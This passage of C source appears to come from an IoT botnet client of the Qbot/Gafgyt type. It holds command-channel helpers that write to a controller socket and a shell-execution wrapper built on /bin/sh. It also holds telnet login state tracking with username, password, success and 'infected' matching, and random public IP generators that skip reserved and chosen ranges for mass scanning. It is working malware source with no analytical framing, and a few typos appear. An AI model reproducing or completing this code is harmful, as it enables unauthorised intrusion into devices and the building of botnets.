  270. int rangesC3[] = {245,80,29,117,198,199,28,29,30,184,185,187,250,64,67,220,60,61,63,252,253,254,54,81,6,253,170,147,41,43,218,220,80,211,89,100,101,103,96,97,197,157,49,80,84,242,111,193,192,105,66,171,62,45,1,10,12,14,2,25,3,32,34,35,4,46,51,56,60,61,63,69,78,8,80,86,89,9,0,120,121,122,13,130,131,139,14,140,141,15,16,164,2,20,22,224,225,226,228,231,232,233,234,235,236,237,238,28,29,31,5,6,72,75,76,77,82,9,34,35,52,144,166,242,104,105,106,107,108,109,111,170,171,224,225,226,1,100,101,102,103,104,105,106,107,108,109,11,110,112,113,115,116,118,120,121,122,125,126,127,128,13,142,143,16,168,169,17,171,172,173,176,178,179,18,19,20,21,24,244,247,25,26,27,28,29,30,31,32,34,35,37,60,66,8,96,97,98,99,201,202,203,204,205,206,207,232,32,33,36,38,16,17,19,22,23,82,155,130,184,237,48,7,193,233,162,46,141,109,84,221,119,144,104,191,213,228,185,242,188,26,36,227,131,204,217,130,155,215,100,107,123,127,149,161,171,191,214,34,37,38,59,74,9,122,53,133,51,32,227,232,233,234,235,249,253,254,92,110,131,58,25,146,112,114,120,121,124,172,173,204,206,208,209,210,212,216,217,218,219,223,64,166,253,98,170,177,67,133,117,2,21,61,11,151,161,186,188,212,214,240,28,73,69,126,127,128,131,136,154,158,168,186,249,34,35,76,78,86,90,95,130,53,90,103,210,236,69,2,160,128,138,172,173,174,175,68,69,70,71,136,137,138,139,148,149,150,151,156,157,158,159,208,209,210,211,25,30,31,33,35,140,143,56,58,188,190,191,41,43,180,181,182,183,196,27,29,42,59,144,155,156,158,189,195,203,208,0,131,198,232,152,207,223,248,28,98,109,149,52,57,43,156,145,179,184,33,37,67,92,78,203,240,2,207,62,237,173,178,187,190,161,4,211,219,2,146,18,216,8,105,106,215,10,110,111,114,116,117,12,120,124,128,129,130,133,136,141,143,144,150,151,153,159,16,160,163,169,17,170,173,174,177,178,179,18,181,182,184,187,189,191,194,196,197,198,2,20,200,203,204,206,207,209,210,22,24,243,244,245,246,247,248,25,251,252,254,26,32,34,35,36,37,38,39,4,45,47,5,50,51,52,55,56,58,60,62,63,65,66,69,9,98,10,100,102,103,106,112,128,131,135,137,139,141,15,150,152,167,17,171,174,175,176,177,178,179,18,182,187,188,189,193,194,195,197,2,20,213,214,215,217,218,223,225,226,227,228,23,230,233,237,239,28,29,3,31,33,34,35,37,38,4,41,45,46,47,49,50,52,54,55,59,6,62,66,7,70,71,76,8,81,83,84,87,89,9,91,99,106,108,11,110,115,116,117,12,126,127,128,13,150,152,154,158,159,16,160,162,164,165,167,168,170,172,174,175,184,185,19,191,192,193,194,200,202,203,204,208,21,213,214,216,223,225,227,231,237,239,27,28,30,33,45,46,47,48,51,54,59,61,74,76,77,78,81,84,86,87,95,17,37,74,85,155,157,5,88,52,82,11,15,79,214,240,116,96,3,3,100,106,109,110,113,115,139,172,185,2,211,224,231,38,48,67,1,100,101,103,105,106,108,116,12,121,122,123,128,13,131,135,137,139,14,140,141,144,146,148,150,151,153,154,155,157,158,159,16,163,168,169,17,172,175,177,178,179,18,181,182,185,187,188,189,19,191,193,195,196,199,20,200,203,211,212,214,217,220,222,224,226,229,230,231,233,234,236,237,238,243,245,249,25,254,27,32,34,36,37,39,4,41,43,44,46,49,50,52,53,54,57,59,63,64,65,69,75,76,77,78,79,8,80,81,83,84,85,89,90,93,94,95,98,99,117,31,7,96,108,145,159,187,195,196,242,247,71,160,199,0,100,106,107,11,110,111,112,113,115,116,117,119,132,133,136,14,153,158,16,163,2,206,218,22,223,226,228,234,243,244,246,247,248,249,251,254,26,6,73,98,99,186,183,213,215,228,237,75,209,210,215,225,226,227,229,230,234,242,112,156,158,182,186,189,195,2,211,219,223,27,63,71,90,94,10,100,101,102,105,107,11,110,112,115,116,118,120,122,125,126,130,132,133,134,138,144,147,148,152,160,161,162,166,167,169,179,182,184,185,191,195,20,205,207,208,209,210,212,215,218,219,22,220,222,223,226,227,23,236,24,243,245,27,29,34,37,39,4,41,43,45,5,50,51,55,56,58,59,61,62,64,65,67,69,7,71,76,77,8,85,87,9,93,96,98,10,100,102,110,112,113,114,117,118,122,13,130,133,134,137,138,140,160,162,163,164,165,166,168,17,170,173,179,18,180,184,19,2,247,249,252,29,3,49,50,52,54,6,7,85,92,96,97,98,0,10,104,105,106,107,114,117,127,14,163,166,168,174,177,181,182,183,185,200,206,208,214,220,222,224,226,232,233,24,244,246,248,253,28,29,3,30,31,37,38,4,40,44,45,48,50,52,53,55,56,58,59,60,61,62,63,64,68,7,70,8,84,89,99,160,149,234,126,130,148,156,212,224,247,253,157,244,13,15,32,57,9,44,123,151,165,231,50,70,9,168,169,139,237,239,31,10,101,102,104,108,109,112,117,120,121,123,124,126,128,129,133,136,137,138,139,140,144,145,156,157,158,159,161,167,168,172,174,176,178,179,181,182,185,190,191,192,198,200,207,227,233,239,242,244,245,248,250,253,28,34,36,37,38,39,45,52,57,6,62,65,67,70,74,76,78,79,80,81,86,95};
  271.  
  272. //Rand bs
  273.  
  274. #define PHI 0x9e3779b9
  275. static uint32_t Q[4096], c = 362436;
  276. int dupppp = 0;
  277. int rangechoice = 1;
  278. int versionnnn = 2;
  279. int subversionnnn = 5;
  280.  
  281. void init_rand(uint32_t x)
  282. {
  283. int i;
  284.  
  285. Q[0] = x;
  286. Q[1] = x + PHI;
  287. Q[2] = x + PHI + PHI;
  288.  
  289. for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
  290. }
  291.  
  292. uint32_t rand_cmwc(void)
  293. {
  294. uint64_t t, a = 18782LL;
  295. static uint32_t i = 4095;
  296. uint32_t x, r = 0xfffffffe;
  297. i = (i + 1) & 4095;
  298. t = a * Q[i] + c;
  299. c = (uint32_t)(t >> 32);
  300. x = t + c;
  301. if (x < c) {
  302. x++;
  303. c++;
  304. }
  305. return (Q[i] = r - x);
  306. }
  307.  
  308. void trim(char *str)
  309. {
  310. int i;
  311. int begin = 0;
  312. int end = strlen(str) - 1;
  313.  
  314. while (isspace(str[begin])) begin++;
  315.  
  316. while ((end >= begin) && isspace(str[end])) end--;
  317. for (i = begin; i <= end; i++) str[i - begin] = str[i];
  318.  
  319. str[i - begin] = '\0';
  320. }
  321.  
  322. static void printchar(unsigned char **str, int c)
  323. {
  324. if (str) {
  325. **str = c;
  326. ++(*str);
  327. }
  328. else (void)write(1, &c, 1);
  329. }
  330.  
  331. static int prints(unsigned char **out, const unsigned char *string, int width, int pad)
  332. {
  333. register int pc = 0, padchar = ' ';
  334.  
  335. if (width > 0) {
  336. register int len = 0;
  337. register const unsigned char *ptr;
  338. for (ptr = string; *ptr; ++ptr) ++len;
  339. if (len >= width) width = 0;
  340. else width -= len;
  341. if (pad & PAD_ZERO) padchar = '0';
  342. }
  343. if (!(pad & PAD_RIGHT)) {
  344. for ( ; width > 0; --width) {
  345. printchar (out, padchar);
  346. ++pc;
  347. }
  348. }
  349. for ( ; *string ; ++string) {
  350. printchar (out, *string);
  351. ++pc;
  352. }
  353. for ( ; width > 0; --width) {
  354. printchar (out, padchar);
  355. ++pc;
  356. }
  357.  
  358. return pc;
  359. }
  360.  
  361. static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase)
  362. {
  363. unsigned char print_buf[PRINT_BUF_LEN];
  364. register unsigned char *s;
  365. register int t, neg = 0, pc = 0;
  366. register unsigned int u = i;
  367.  
  368. if (i == 0) {
  369. print_buf[0] = '0';
  370. print_buf[1] = '\0';
  371. return prints (out, print_buf, width, pad);
  372. }
  373.  
  374. if (sg && b == 10 && i < 0) {
  375. neg = 1;
  376. u = -i;
  377. }
  378.  
  379. s = print_buf + PRINT_BUF_LEN-1;
  380. *s = '\0';
  381.  
  382. while (u) {
  383. t = u % b;
  384. if( t >= 10 )
  385. t += letbase - '0' - 10;
  386. *--s = t + '0';
  387. u /= b;
  388. }
  389.  
  390. if (neg) {
  391. if( width && (pad & PAD_ZERO) ) {
  392. printchar (out, '-');
  393. ++pc;
  394. --width;
  395. }
  396. else {
  397. *--s = '-';
  398. }
  399. }
  400.  
  401. return pc + prints (out, s, width, pad);
  402. }
  403.  
  404. static int print(unsigned char **out, const unsigned char *format, va_list args )
  405. {
  406. register int width, pad;
  407. register int pc = 0;
  408. unsigned char scr[2];
  409.  
  410. for (; *format != 0; ++format) {
  411. if (*format == '%') {
  412. ++format;
  413. width = pad = 0;
  414. if (*format == '\0') break;
  415. if (*format == '%') goto out;
  416. if (*format == '-') {
  417. ++format;
  418. pad = PAD_RIGHT;
  419. }
  420. while (*format == '0') {
  421. ++format;
  422. pad |= PAD_ZERO;
  423. }
  424. for ( ; *format >= '0' && *format <= '9'; ++format) {
  425. width *= 10;
  426. width += *format - '0';
  427. }
  428. if( *format == 's' ) {
  429. register char *s = (char *)va_arg( args, int );
  430. pc += prints (out, s?s:"(null)", width, pad);
  431. continue;
  432. }
  433. if( *format == 'd' ) {
  434. pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
  435. continue;
  436. }
  437. if( *format == 'x' ) {
  438. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
  439. continue;
  440. }
  441. if( *format == 'X' ) {
  442. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
  443. continue;
  444. }
  445. if( *format == 'u' ) {
  446. pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
  447. continue;
  448. }
  449. if( *format == 'c' ) {
  450. scr[0] = (unsigned char)va_arg( args, int );
  451. scr[1] = '\0';
  452. pc += prints (out, scr, width, pad);
  453. continue;
  454. }
  455. }
  456. else {
  457. out:
  458. printchar (out, *format);
  459. ++pc;
  460. }
  461. }
  462. if (out) **out = '\0';
  463. va_end( args );
  464. return pc;
  465. }
  466.  
  467. int zprintf(const unsigned char *format, ...)
  468. {
  469. va_list args;
  470. va_start( args, format );
  471. return print( 0, format, args );
  472. }
  473.  
  474. int szprintf(unsigned char *out, const unsigned char *format, ...)
  475. {
  476. va_list args;
  477. va_start( args, format );
  478. return print( &out, format, args );
  479. }
  480.  
  481.  
  482. int sockprintf(int sock, char *formatStr, ...)
  483. {
  484. unsigned char *textBuffer = malloc(2048);
  485. memset(textBuffer, 0, 2048);
  486. char *orig = textBuffer;
  487. va_list args;
  488. va_start(args, formatStr);
  489. print(&textBuffer, formatStr, args);
  490. va_end(args);
  491. orig[strlen(orig)] = '\n';
  492. int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
  493. free(orig);
  494. return q;
  495. }
  496.  
  497. static int *fdopen_pids;
  498.  
  499. int fdpopen(unsigned char *program, register unsigned char *type)
  500. {
  501. register int iop;
  502. int pdes[2], fds, pid;
  503.  
  504. if (*type != 'r' && *type != 'w' || type[1]) return -1;
  505.  
  506. if (pipe(pdes) < 0) return -1;
  507. if (fdopen_pids == NULL) {
  508. if ((fds = getdtablesize()) <= 0) return -1;
  509. if ((fdopen_pids = (int *)malloc((unsigned int)(fds * sizeof(int)))) == NULL) return -1;
  510. memset((unsigned char *)fdopen_pids, 0, fds * sizeof(int));
  511. }
  512.  
  513. switch (pid = vfork())
  514. {
  515. case -1:
  516. close(pdes[0]);
  517. close(pdes[1]);
  518. return -1;
  519. case 0:
  520. if (*type == 'r') {
  521. if (pdes[1] != 1) {
  522. dup2(pdes[1], 1);
  523. close(pdes[1]);
  524. }
  525. close(pdes[0]);
  526. } else {
  527. if (pdes[0] != 0) {
  528. (void) dup2(pdes[0], 0);
  529. (void) close(pdes[0]);
  530. }
  531. (void) close(pdes[1]);
  532. }
  533. execl("/bin/sh", "sh", "-c", program, NULL);
  534. _exit(127);
  535. }
  536. if (*type == 'r') {
  537. iop = pdes[0];
  538. (void) close(pdes[1]);
  539. } else {
  540. iop = pdes[1];
  541. (void) close(pdes[0]);
  542. }
  543. fdopen_pids[iop] = pid;
  544. return (iop);
  545. }
  546.  
  547. int fdpclose(int iop)
  548. {
  549. register int fdes;
  550. sigset_t omask, nmask;
  551. int pstat;
  552. register int pid;
  553.  
  554. if (fdopen_pids == NULL || fdopen_pids[iop] == 0) return (-1);
  555. (void) close(iop);
  556. sigemptyset(&nmask);
  557. sigaddset(&nmask, SIGINT);
  558. sigaddset(&nmask, SIGQUIT);
  559. sigaddset(&nmask, SIGHUP);
  560. (void) sigprocmask(SIG_BLOCK, &nmask, &omask);
  561. do {
  562. pid = waitpid(fdopen_pids[iop], (int *) &pstat, 0);
  563. } while (pid == -1 && errno == EINTR);
  564. (void) sigprocmask(SIG_SETMASK, &omask, NULL);
  565. fdopen_pids[fdes] = 0;
  566. return (pid == -1 ? -1 : WEXITSTATUS(pstat));
  567. }
  568.  
  569. unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd)
  570. {
  571. int got = 1, total = 0;
  572. while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
  573. return got == 0 ? NULL : buffer;
  574. }
  575.  
  576. static const long hextable[] = {
  577. [0 ... 255] = -1,
  578. ['0'] = 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
  579. ['A'] = 10, 11, 12, 13, 14, 15,
  580. ['a'] = 10, 11, 12, 13, 14, 15
  581. };
  582.  
  583. long parseHex(unsigned char *hex)
  584. {
  585. long ret = 0;
  586. while (*hex && ret >= 0) ret = (ret << 4) | hextable[*hex++];
  587. return ret;
  588. }
  589.  
  590. int wildString(const unsigned char* pattern, const unsigned char* string) {
  591. switch(*pattern)
  592. {
  593. case '\0': return *string;
  594. case '*': return !(!wildString(pattern+1, string) || *string && !wildString(pattern, string+1));
  595. case '?': return !(*string && !wildString(pattern+1, string+1));
  596. default: return !((toupper(*pattern) == toupper(*string)) && !wildString(pattern+1, string+1));
  597. }
  598. }
  599.  
  600. int getHost(unsigned char *toGet, struct in_addr *i)
  601. {
  602. struct hostent *h;
  603. if((i->s_addr = inet_addr(toGet)) == -1) return 1;
  604. return 0;
  605. }
  606.  
  607. void uppercase(unsigned char *str)
  608. {
  609. while(*str) { *str = toupper(*str); str++; }
  610. }
  611.  
  612. int getBogos(unsigned char *bogomips)
  613. {
  614. int cmdline = open("/proc/cpuinfo", O_RDONLY);
  615. char linebuf[4096];
  616. while(fdgets(linebuf, 4096, cmdline) != NULL)
  617. {
  618. uppercase(linebuf);
  619. if(strstr(linebuf, "BOGOMIPS") == linebuf)
  620. {
  621. unsigned char *pos = linebuf + 8;
  622. while(*pos == ' ' || *pos == '\t' || *pos == ':') pos++;
  623. while(pos[strlen(pos)-1] == '\r' || pos[strlen(pos)-1] == '\n') pos[strlen(pos)-1]=0;
  624. if(strchr(pos, '.') != NULL) *strchr(pos, '.') = 0x00;
  625. strcpy(bogomips, pos);
  626. close(cmdline);
  627. return 0;
  628. }
  629. memset(linebuf, 0, 4096);
  630. }
  631. close(cmdline);
  632. return 1;
  633. }
  634.  
  635. int getCores()
  636. {
  637. int totalcores = 0;
  638. int cmdline = open("/proc/cpuinfo", O_RDONLY);
  639. char linebuf[4096];
  640. while(fdgets(linebuf, 4096, cmdline) != NULL)
  641. {
  642. uppercase(linebuf);
  643. if(strstr(linebuf, "BOGOMIPS") == linebuf) totalcores++;
  644. memset(linebuf, 0, 4096);
  645. }
  646. close(cmdline);
  647. return totalcores;
  648.  
  649. }
  650.  
  651. void makeRandomStr(unsigned char *buf, int length)
  652. {
  653. int i = 0;
  654. for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
  655. }
  656.  
  657. int recvLine(int socket, unsigned char *buf, int bufsize)
  658. {
  659. memset(buf, 0, bufsize);
  660.  
  661. fd_set myset;
  662. struct timeval tv;
  663. tv.tv_sec = 30;
  664. tv.tv_usec = 0;
  665. FD_ZERO(&myset);
  666. FD_SET(socket, &myset);
  667. int selectRtn, retryCount;
  668. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
  669. while(retryCount < 10)
  670. {
  671. sockprintf(mainCommSock, "PING");
  672.  
  673. tv.tv_sec = 30;
  674. tv.tv_usec = 0;
  675. FD_ZERO(&myset);
  676. FD_SET(socket, &myset);
  677. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
  678. retryCount++;
  679. continue;
  680. }
  681.  
  682. break;
  683. }
  684. }
  685.  
  686. unsigned char tmpchr;
  687. unsigned char *cp;
  688. int count = 0;
  689.  
  690. cp = buf;
  691. while(bufsize-- > 1)
  692. {
  693. if(recv(mainCommSock, &tmpchr, 1, 0) != 1) {
  694. *cp = 0x00;
  695. return -1;
  696. }
  697. *cp++ = tmpchr;
  698. if(tmpchr == '\n') break;
  699. count++;
  700. }
  701. *cp = 0x00;
  702.  
  703. // zprintf("recv: %s\n", cp);
  704.  
  705. return count;
  706. }
  707.  
  708. struct telstate_t
  709. {
  710. int fd;
  711. unsigned int ip;
  712. unsigned char state;
  713. unsigned char complete;
  714. unsigned char usernameInd;
  715. unsigned char passwordInd;
  716. unsigned char tempDirInd;
  717. unsigned int totalTimeout;
  718. unsigned short bufUsed;
  719. char *sockbuf;
  720. };
  721. const char* get_telstate_host(struct telstate_t* telstate)
  722. {
  723. struct in_addr in_addr_ip;
  724. in_addr_ip.s_addr = telstate->ip;
  725. return inet_ntoa(in_addr_ip);
  726. }
  727.  
  728. int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings)
  729. {
  730. int num_bytes, i;
  731. memset(buffer, 0, buf_size);
  732. num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
  733.  
  734. if(buffer[0] == 0xFF)
  735. {
  736. negotiate(fd, buffer, 3);
  737. }
  738.  
  739. if(contains_string(buffer, strings))
  740. {
  741. return 1;
  742. }
  743.  
  744. return 0;
  745. }
  746. int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size)
  747. {
  748. fd_set read_set;
  749. struct timeval tv;
  750. tv.tv_sec = 0;
  751. tv.tv_usec = timeout_usec;
  752.  
  753. FD_ZERO(&read_set);
  754. FD_SET(fd, &read_set);
  755.  
  756. if (select(fd+1, &read_set, NULL, NULL, &tv) < 1)
  757. return 0;
  758.  
  759. return recv(fd, buffer, buf_size, 0);
  760. }
  761. void advance_state(struct telstate_t* telstate, int new_state)
  762. {
  763. if(new_state == 0)
  764. {
  765. close(telstate->fd);
  766. }
  767.  
  768. telstate->totalTimeout = 0;
  769. telstate->state = new_state;
  770. memset((telstate->sockbuf), 0, BUFFER_SIZE);
  771. }
  772.  
  773. void reset_telstate(struct telstate_t* telstate)
  774. {
  775. advance_state(telstate, 0);
  776. telstate->complete = 1;
  777. }
  778. int contains_success(char* buffer)
  779. {
  780. return contains_string(buffer, successes);
  781. }
  782. int contains_fail(char* buffer)
  783. {
  784. return contains_string(buffer, fails);
  785. }
  786.  
  787. int contains_response(char* buffer)
  788. {
  789. return contains_success(buffer) || contains_fail(buffer);
  790. }
  791. int contains_string(char* buffer, char** strings)
  792. {
  793. int num_strings = 0, i = 0;
  794.  
  795. for(num_strings = 0; strings[++num_strings] != 0; );
  796.  
  797. for(i = 0; i < num_strings; i++)
  798. {
  799. if(strcasestr(buffer, strings[i]))
  800. {
  801. return 1;
  802. }
  803. }
  804.  
  805. return 0;
  806. }
  807.  
  808.  
  809. int contains_infectmessage(char* buffer)
  810. {
  811. return contains_string(buffer, infected);
  812. }
  813.  
  814. int connectTimeout(int fd, char *host, int port, int timeout)
  815. {
  816. struct sockaddr_in dest_addr;
  817. fd_set myset;
  818. struct timeval tv;
  819. socklen_t lon;
  820.  
  821. int valopt;
  822. long arg = fcntl(fd, F_GETFL, NULL);
  823. arg |= O_NONBLOCK;
  824. fcntl(fd, F_SETFL, arg);
  825.  
  826. dest_addr.sin_family = AF_INET;
  827. dest_addr.sin_port = htons(port);
  828. if(getHost(host, &dest_addr.sin_addr)) return 0;
  829. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  830. int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  831.  
  832. if (res < 0) {
  833. if (errno == EINPROGRESS) {
  834. tv.tv_sec = timeout;
  835. tv.tv_usec = 0;
  836. FD_ZERO(&myset);
  837. FD_SET(fd, &myset);
  838. if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
  839. lon = sizeof(int);
  840. getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  841. if (valopt) return 0;
  842. }
  843. else return 0;
  844. }
  845. else return 0;
  846. }
  847.  
  848. arg = fcntl(fd, F_GETFL, NULL);
  849. arg &= (~O_NONBLOCK);
  850. fcntl(fd, F_SETFL, arg);
  851.  
  852. return 1;
  853. }
  854.  
  855. int listFork()
  856. {
  857. uint32_t parent, *newpids, i;
  858. parent = fork();
  859. if (parent <= 0) return parent;
  860. numpids++;
  861. newpids = (uint32_t*)malloc((numpids + 1) * 4);
  862. for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
  863. newpids[numpids - 1] = parent;
  864. free(pids);
  865. pids = newpids;
  866. return parent;
  867. }
  868.  
  869. int negotiate(int sock, unsigned char *buf, int len)
  870. {
  871. unsigned char c;
  872.  
  873. switch (buf[1]) {
  874. case CMD_IAC: //opps/ return 0;
  875. case CMD_WILL:
  876. case CMD_WONT:
  877. case CMD_DO:
  878. case CMD_DONT:
  879. c = CMD_IAC;
  880. send(sock, &c, 1, MSG_NOSIGNAL);
  881. if (CMD_WONT == buf[1]) c = CMD_DONT;
  882. else if (CMD_DONT == buf[1]) c = CMD_WONT;
  883. else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
  884. else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
  885. send(sock, &c, 1, MSG_NOSIGNAL);
  886. send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
  887. break;
  888.  
  889. default:
  890. break;
  891. }
  892.  
  893. return 0;
  894. }
  895.  
  896. int matchPrompt(char *bufStr)
  897. {
  898. char *prompts = ":>%$#\0";
  899.  
  900. int bufLen = strlen(bufStr);
  901. int i, q = 0;
  902. for(i = 0; i < strlen(prompts); i++)
  903. {
  904. while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
  905. if(*(bufStr + bufLen - q) == prompts[i]) return 1;
  906. }
  907.  
  908. return 0;
  909. }
  910.  
  911. int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex)
  912. {
  913. int bufferUsed = initialIndex, got = 0, found = 0;
  914. fd_set myset;
  915. struct timeval tv;
  916. tv.tv_sec = timeout;
  917. tv.tv_usec = timeoutusec;
  918. unsigned char *initialRead = NULL;
  919.  
  920. while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0))
  921. {
  922. FD_ZERO(&myset);
  923. FD_SET(fd, &myset);
  924. if (select(fd+1, &myset, NULL, NULL, &tv) < 1) break;
  925. initialRead = buffer + bufferUsed;
  926. got = recv(fd, initialRead, 1, 0);
  927. if(got == -1 || got == 0) return 0;
  928. bufferUsed += got;
  929. if(*initialRead == 0xFF)
  930. {
  931. got = recv(fd, initialRead + 1, 2, 0);
  932. if(got == -1 || got == 0) return 0;
  933. bufferUsed += got;
  934. if(!negotiate(fd, initialRead, 3)) return 0;
  935. } else {
  936. if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer))) { found = 1; break; }
  937. }
  938. }
  939.  
  940. if(found) return 1;
  941. return 0;
  942. }
  943.  
  944. // Funcs shoutout to exile for helping me with the rest of this
  945.  
  946. tatic uint8_t ipState[5] = {0};
  947. in_addr_t getRandomPublicIP()
  948. {
  949. //if(ipState[1] > 0 && ipState[4] < 255)
  950. //{
  951. // ipState[4]++;
  952. // char ip[16] = {0};
  953. // szprintf(ip, "%d.%d.%d.%d", ipState[1], ipState[2], ipState[3], ipState[4]);
  954. // return inet_addr(ip);
  955. //}
  956.  
  957. ipState[0] = rand() % 255;
  958. ipState[1] = rand() % 255;
  959. ipState[2] = rand() % 255;
  960. ipState[3] = rand() % 255;
  961.  
  962. while(
  963. (ipState[0] == 0) ||
  964. (ipState[0] == 10) ||
  965. (ipState[0] == 100 && (ipState[1] >= 64 && ipState[1] <= 127)) ||
  966. (ipState[0] == 127) ||
  967. (ipState[0] == 169 && ipState[1] == 254) ||
  968. (ipState[0] == 172 && (ipState[1] <= 16 && ipState[1] <= 31)) ||
  969. (ipState[0] == 192 && ipState[1] == 0 && ipState[2] == 2) ||
  970. (ipState[0] == 192 && ipState[1] == 88 && ipState[2] == 99) ||
  971. (ipState[0] == 192 && ipState[1] == 168) ||
  972. (ipState[0] == 198 && (ipState[1] == 18 || ipState[1] == 19)) ||
  973. (ipState[0] == 198 && ipState[1] == 51 && ipState[2] == 100) ||
  974. (ipState[0] == 203 && ipState[1] == 0 && ipState[2] == 113) ||
  975. (ipState[0] == 188 && ipState[1] == 209 && ipState[2] == 52) ||
  976. (ipState[0] == 188 && ipState[1] == 209 && ipState[2] == 49) ||
  977. (ipState[0] == 185 && ipState[1] == 62 && ipState[2] == 190) ||
  978. (ipState[0] == 185 && ipState[1] == 62 && ipState[2] == 189) ||
  979. (ipState[0] == 185 && ipState[1] == 62 && ipState[2] == 188) ||
  980. (ipState[0] == 185 && ipState[1] == 61 && ipState[2] == 137) ||
  981. (ipState[0] == 185 && ipState[1] == 61 && ipState[2] == 136) ||
  982. (ipState[0] == 185 && ipState[1] == 11 && ipState[2] == 147) ||
  983. (ipState[0] == 185 && ipState[1] == 11 && ipState[2] == 146) ||
  984. (ipState[0] == 185 && ipState[1] == 11 && ipState[2] == 145) ||
  985. (ipState[0] == 63 && ipState[1] == 141 && ipState[2] == 241) ||
  986. (ipState[0] == 69 && ipState[1] == 30 && ipState[2] == 192) ||
  987. (ipState[0] == 69 && ipState[1] == 30 && ipState[2] == 244) ||
  988. (ipState[0] == 69 && ipState[1] == 197 && ipState[2] == 128) ||
  989. (ipState[0] == 162 && ipState[1] == 251 && ipState[2] == 120) ||
  990. (ipState[0] == 173 && ipState[1] == 208 && ipState[2] == 128) ||
  991. (ipState[0] == 173 && ipState[1] == 208 && ipState[2] == 180) ||
  992. (ipState[0] == 173 && ipState[1] == 208 && ipState[2] == 250) ||
  993. (ipState[0] == 192 && ipState[1] == 187 && ipState[2] == 113) ||
  994. (ipState[0] == 198 && ipState[1] == 204 && ipState[2] == 241) ||
  995. (ipState[0] == 204 && ipState[1] == 10 && ipState[2] == 160) ||
  996. (ipState[0] == 204 && ipState[1] == 12 && ipState[2] == 192) ||
  997. (ipState[0] == 208 && ipState[1] == 110 && ipState[2] == 64) ||
  998. (ipState[0] == 208 && ipState[1] == 110 && ipState[2] == 72) ||
  999. (ipState[0] == 208 && ipState[1] == 67) ||
  1000. (ipState[0] == 94 && ipState[1] == 102 && ipState[2] == 48) ||
  1001. (ipState[0] == 93 && ipState[1] == 174 && ipState[2] == 88) ||
  1002. (ipState[0] == 89 && ipState[1] == 248 && ipState[2] == 174) ||
  1003. (ipState[0] == 89 && ipState[1] == 248 && ipState[2] == 172) ||
  1004. (ipState[0] == 89 && ipState[1] == 248 && ipState[2] == 170) ||
  1005. (ipState[0] == 89 && ipState[1] == 248 && ipState[2] == 169) ||
  1006. (ipState[0] == 89 && ipState[1] == 248 && ipState[2] == 160) ||
  1007. (ipState[0] >= 224)
  1008. )
  1009. {
  1010. ipState[0] = rand() % 255;
  1011. ipState[1] = rand() % 255;
  1012. ipState[2] = rand() % 255;
  1013. ipState[3] = rand() % 255;
  1014. }
  1015.  
  1016. char ip[16] = {0};
  1017. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  1018. return inet_addr(ip);
  1019. }
  1020.  
  1021. in_addr_t getRandomPublicIP2()
  1022. {
  1023. int range = rand() % (sizeof(oldranges)/sizeof(char *));
  1024. ipState[0] = oldranges[range];
  1025. ipState[1] = oldranges2[range];
  1026. ipState[2] = rand() % 255;
  1027. ipState[3] = rand() % 255;
  1028. char ip[16] = {0};
  1029. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  1030. return inet_addr(ip);
  1031. }
  1032.  
  1033. in_addr_t getRandomPublicIPA()
  1034. {
  1035. int range = rand() % (sizeof(rangesA)/sizeof(char *));
  1036. ipState[0] = rangesA[range];
  1037. ipState[1] = rand() % 255;
  1038. ipState[2] = rand() % 255;
  1039. ipState[3] = rand() % 255;
  1040. char ip[16] = {0};
  1041. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  1042. return inet_addr(ip);
  1043. }
  1044.  
  1045. in_addr_t getRandomPublicIPB()
  1046. {
  1047. int range = rand() % (sizeof(rangesB1)/sizeof(char *));
  1048. ipState[0] = rangesB1[range];
  1049. ipState[1] = rangesB2[range];
  1050. ipState[2] = rand() % 255;
  1051. ipState[3] = rand() % 255;
  1052. char ip[16] = {0};
  1053. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  1054. return inet_addr(ip);
  1055. }
  1056.  
  1057. in_addr_t getRandomPublicIPC()
  1058. {
  1059. int range = rand() % (sizeof(rangesC1)/sizeof(char *));
  1060. ipState[0] = rangesC1[range];
  1061. ipState[1] = rangesC2[range];
  1062. ipState[2] = rangesC3[range];
  1063. ipState[3] = rand() % 255;
  1064. char ip[16] = {0};
  1065. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  1066. return inet_addr(ip);
  1067. }
  1068.  
  1069.  
